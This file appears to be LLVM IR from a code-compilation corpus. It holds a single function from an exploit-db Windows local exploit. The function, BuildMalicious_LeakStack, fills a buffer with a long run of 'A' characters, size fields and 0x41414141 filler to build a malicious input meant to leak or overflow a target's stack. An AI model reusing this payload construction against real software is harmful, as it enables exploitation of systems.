; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_24207.c_BuildMalicious_LeakStack.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_24207.c_BuildMalicious_LeakStack.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@BuildMalicious_LeakStack.buf = internal global [16416 x i32] zeroinitializer, align 16

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32* @BuildMalicious_LeakStack() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i32, align 4
  store i32 0, i32* %1, align 4
  %3 = call i32 @WriteWord(i32 82)
  store i32 0, i32* %2, align 4
  br label %4

4:                                                ; preds = %9, %0
  %5 = load i32, i32* %2, align 4
  %6 = icmp slt i32 %5, 8192
  br i1 %6, label %7, label %12

7:                                                ; preds = %4
  %8 = call i32 @WriteWord(i32 65)
  br label %9

9:                                                ; preds = %7
  %10 = load i32, i32* %2, align 4
  %11 = add nsw i32 %10, 1
  store i32 %11, i32* %2, align 4
  br label %4

12:                                               ; preds = %4
  %13 = call i32 @WriteWord(i32 0)
  %14 = call i32 @WriteDword(i32 0)
  %15 = call i32 @WriteDword(i32 16504)
  %16 = call i32 @WriteDword(i32 1094795585)
  %17 = call i32 @WriteDword(i32 1094795585)
  %18 = call i32 @WriteDword(i32 1094795585)
  %19 = call i32 @WriteDword(i32 1094795585)
  %20 = call i32 @WriteDword(i32 1094795585)
  ret i32* getelementptr inbounds ([16416 x i32], [16416 x i32]* @BuildMalicious_LeakStack.buf, i64 0, i64 0)
}

declare dso_local i32 @WriteWord(i32) #1

declare dso_local i32 @WriteDword(i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
